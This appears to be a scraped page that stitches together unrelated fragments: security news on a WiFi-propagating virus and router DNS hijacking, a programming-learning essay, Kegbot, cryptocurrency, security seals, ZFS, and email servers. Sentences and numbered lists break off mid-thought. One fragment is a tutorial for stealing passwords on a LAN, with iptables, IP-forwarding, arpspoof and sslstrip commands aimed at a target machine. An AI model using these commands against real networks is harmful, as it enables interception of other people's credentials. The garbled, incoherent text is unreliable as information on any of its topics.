Chameleon Virus that Spreads Across WiFi Access Points like Common Cold. Do you know, A Computer viruses could go Airborne over WiFi networks? Security researchers at the University of Liverpool in Britain have demonstrated a WiFi virus that can spread between computer networks just like the 'common cold' spreads between Humans.They have created a proof-of-concept which can infect the entire wireless network instead of a single computer at a time, that replaces the firmware of the vulnerable Access Point (AP) with a virus-loaded version, and then propagates itself to the next victim on the WiFi network. The WiFi based virus named as 'Chameleon', that can self-propagate over WiFi networks from access point to access point, but doesn't affect the working of the Wireless Access Point.
This Virus is able to identify WiFi access points that are not protected by encryption and passwords, according to the research paper. It can badly hit less-protected open access WiFi networks available in coffee shops or airports. It propagates in the following sequence: Teach Yourself a New Programming Language in 21 Minutes (Or 2-3 Years, It Depends) | Heart, Mind and Code. You’re sitting at work, grinding out a bug in the legacy system, when your boss comes in and tells the team that you finally get the chance to rewrite the whole system–and even better, you get to do it in Clojure! (Or Scala or Erlang or Rust or Dart or some other Language You Only Know A Little About But Have Secretly Wanted To Learn For A While Now.) Or maybe you’re happy with the language you’re using, but your VP of Software Architecture just spent $150,000 on a suite of Enterprise Tools which includes a module that will let your project scale infinitely into the cloud… all you have to do is learn Clojure.
(Or Scala or Erlang or Rust or Dart or some other Language You’ve Only Heard a Few Mutterings About But Desperately Want To Avoid Learning.) Either way, you’ve got a problem: you need to ramp up in this new language. Teach Yourself A New Programming Language In 21 Minutes (Or 2-3 Years, It Depends) All you need to do to learn a new language is learn: I’m not entirely kidding. Whaaat. Learn to Code: The Full Beginner's Guide. CS50x: Introduction to Computer Science. CS50x is Harvard College's introduction to the intellectual enterprises of computer science and the art of programming for majors and non-majors alike, with or without prior programming experience. An entry-level course taught by David J. Malan, CS50x teaches students how to think algorithmically and solve problems efficiently.
Bento - Learn to code. Kegbot makes creating an Android-controlled kegerator easy. The idea of a connected kegerator isn't anything new. We've seen quite a few startups build high-tech kegs -- even Google has gotten in on the action. Those projects, however, require quite a bit of technical know-how. Now there's an easier solution for the beer enthusiasts: Kegbot.
Kegbot is a bit different simply because it handles most of the geeky stuff for you. To get the device up and running, you just have to connect a flow sensor to your keg's line, and connect the pre-made board to your favorite Android tablet. Creators Mike Wakerly and Eric Webb have been at the smart keg game for a while. Kegbot Hands-on Photos See all photos 11 Photos The Kegbot we saw was hooked up to a run-of-the-mill single-tap Haier kegerator, and used a Motorola Xoom tablet for its interface. Once you've gotten everything connected, everyone drinking from your keg will need their own Kegbot account. Kegbot Interface See all photos 7 Photos Comments.
Kegbot Interface. Ettercap + Sslstrip + Hamster + Driftnet + Urlsnarf Script BT5 R1 :-) How to use sslstrip in kali linux ~ Geeky Shows. Intro – In this tutorial we will use sslstrip for stealing password from any PC which is connected in LAN. SSLStrip basically hijacks HTTP traffic. Now a days its little difficult to steal password of some website. 1. How to open A. Application →Kali Linux → Information gathering → SSL Analysis → sslstrip (click on image for large view) B. Before starting sslstrip we need to do some other works for trapping our target a.
B. C. D. E. 2. Syntax – echo ‘1’ > /proc/sys/net/ipv4/ip_forward 3. Syntax – iptables –t nat –A PREROUTING –p tcp –destination-port 80 –j REDIRECT –to-port 8080 4. Syntax – netstat -nr 5. 6. Syntax – arpspoof –i interface –t target IP –r gateway Ip Ex – arpspoof –i eth0 –t 192.168.71.128 –r 192.168.71.2 7. 8. Syntax – sslstrip –l 8080 9. 10. after clicking sign in on target os come to the attacker PC (Kali Linux). 11. 12. use cat and open your sslstrip.log file and watch carefully.
Syntax – cat sslstrip.log All in one(do like this) (click on image for large view) How To Create Your Own Cryptocurrency. When you look at the complexities that go into making a physical dollar bill it’s plain to see why most people don’t start trying to print a new form of currency every day, but making a new digital currency is surprisingly easy for someone with even basic coding skills. But coding isn’t the only step to getting your digital currency off the ground.
Here are the five steps you should follow according to the makers of three cryptocurrencies. 1Reaction 1. When you think about creating a new digital currency it's easy to assume the first step would be to begin coding your coin, but that’s the wrong place to start, according to Chris Ellis, a London entrepreneur and a community activist at Feathercoin.
“The first step is to find a community and build a currency around them rather than building a currency and expecting everyone to show up,” Ellis says. Feathercoin was created by Peter Bushnell in April 2013. 3Reactions 2Reactions 2. “The creation itself does not take long. 3. 4. 5. Security seal - Video Encyclopedia. A basic metal security seal and a basic plastic security seal. Security seals are mechanisms used to seal shipping containers in a way that provides tamper evidence and some level of security. Such seals can help to detect theft or contamination, either accidental or deliberate. Security seals are commonly used to secure truck trailers, vessel containers, chemical drums, airline duty-free trolleys and utility meters. Typically they are considered an inexpensive way of providing tamper evidence of intrusion into sensitive spaces.  Vulnerabilities Security seals are not designed to resolve all security problems: The effectiveness of seals is strongly dependent on the proper protocols for using them.
Operation A measure of a seal's security is whether it has obtained an ISO PAS 17712 rating. The requirements for certain security level of seals are defined in the ISO PAS 17712.  There are several basic designs of the metal seals; bolt seals, ball seals and cable seals. How to run your own e-mail server with your own domain, part 1. E-mail is old and complex. It's the oldest still-recognizable component of the Internet, with its modern incarnation having coalesced out of several different decades-old messaging technologies including ARPANET node-to-node messaging in the early 1970s.
And though it remains a cornerstone of the Internet—the original killer app, really—it's also extraordinarily hard to do right. We most often interact with e-mail servers through friendly Web-based front-ends or applications, but a tremendous amount of work goes into hiding the complexity that allows the whole system to work. E-mail functions in a poisoned and hostile environment, flooded by viruses and spam. The seemingly simple exchange of text-based messages operates under complex rules with complex tools, all necessary to keep the poison out and the system functioning and useful in spite of the abuse it's constantly under.
I'll tell you why: because if it's in the cloud, it's not yours. Well, to hell with that. E-mail is hard. How to run your own e-mail server with your own domain, part 1. Ars walkthrough: Using the ZFS next-gen filesystem on Linux. In my last article on next-gen filesystems, we did something in between a generic high altitude overview of next-gen filesystems and a walkthrough of some of btrfs' features and usage. This time, we're going to specifically look at what ZFS brings to the table, walking through getting it installed and using it on one of the more popular Linux distributions: Precise Pangolin. That's the most current Long Term Support (LTS) Ubuntu release. With that said... if Ubuntu's not your cup of tea, don't worry! There are lots of options for running ZFS, and very little of this walkthrough will really depend on your use of Ubuntu in particular or even Linux in general. You can always visit directly for help with the initial installation if you prefer RHEL or Fedora or Arch or what have you—and if you're a BSD fan, ZFS is available from the base installer in either PC-BSD or in the latest 10.0 release of FreeBSD itself.
Prerequisites and installation Initial tuning vdev zpool Parity. 2014/02/hackers-exploiting-router.html. In past months, we have reported about critical vulnerabilities in many wireless Routers including Netgear, Linksys, TP-LINK, Cisco, ASUS, TENDA and more vendors, installed by millions of home users worldwide. Polish Computer Emergency Response Team (CERT Polska) recently noticed a large scale cyber attack ongoing campaign aimed at Polish e-banking users. Cyber criminals are using known router vulnerability which allow attackers to change the router's DNS configuration remotely so they can lure users to fake bank websites or can perform Man-in-the-Middle attack. 'After DNS servers settings are changed on a router, all queries from inside the network are forwarded to rogue servers. Obviously the platform of a client device is not an issue, as there is no need for the attackers to install any malicious software at all.' To perform this, he used DNS Proxy tool 'Dnschef' and exploitation tools including Metasploit, webmitm and Burp Suite.
Install these tools and run following command: . 2014/02/hackers-exploiting-router.html.